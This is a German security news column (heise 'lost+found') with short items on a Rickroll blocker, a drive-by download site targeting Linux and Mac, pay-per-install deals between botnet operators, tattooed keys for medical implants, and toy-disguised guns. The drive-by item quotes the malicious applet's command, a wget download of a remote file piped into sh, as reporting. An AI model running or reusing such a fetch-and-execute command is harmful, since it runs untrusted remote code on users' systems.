lost+found: Rickrolling, Schaumschlag, Pay-per-Install, Tätowierungen, bunte Waffen
Rickroll Protector, Angriff ins Leere, kooperierende Botnetz-Betreiber, Passwort in die Haut tätowiert, Schußwaffen als Spielzeig getarnt.
- Daniel Bachfeld
Schon wieder ein Rickrolling-Opfer geworden? Das muss nicht sein, der Rickroll Protector verspricht Abhilfe – naja, er versprach Abhilfe.
Kürzlich entdeckte heise Security eine Drive-by-Download-Seite, die gezielt auch Linux- und Mac-OS-X-Systeme angriff. Genaueres Hinsehen zeigte dann, dass der Java-Code ganz ohne Exploit versuchte via Runtime.getRuntime().exec() auf einem Linux folgendes auszuführen: wget http://.../Install.exe -O- | sh. Wir waren nicht wirklich beeindruckt...
Bot-Net-Betreiber konkurrieren nicht zwangsläufig bei der Infektion von PCs, sie können auch durchaus kooperieren. So installieren Bots weitere Bots auf einem System auf Basis von Pay-per-Install-Geschäften zwischen den jeweiligen Betreibern. Auch Scareware soll so ihren Weg auf den Rechner eines infizierten Rechner finden. Angesichts der großen Zahlen von Zombies – 100.000 sind nicht selten – lässt sich mit ein paar Dollar pro Installation viel Geld verdienen.
Microsoft schlägt vor, Wartungszugriffe auf medizinische Implantate wie Herzschrittmacher und Defibrillatoren nur nach einer Authentifizierung zu erlauben. Der Schlüssel dazu soll Patienten in die Haut tätowiert werden – mit einer Tinte, die nur unter UV-Licht sichtbar ist.
Spielzeuge, die aussehen wie echte Waffen, kennt man bereits. Schusswaffen, die aussehen wie Spielzeuge sind indes neu. Offenbar tarnen Kriminelle den USA ihre Waffen aber mitunter auf diese Weise. (dab)
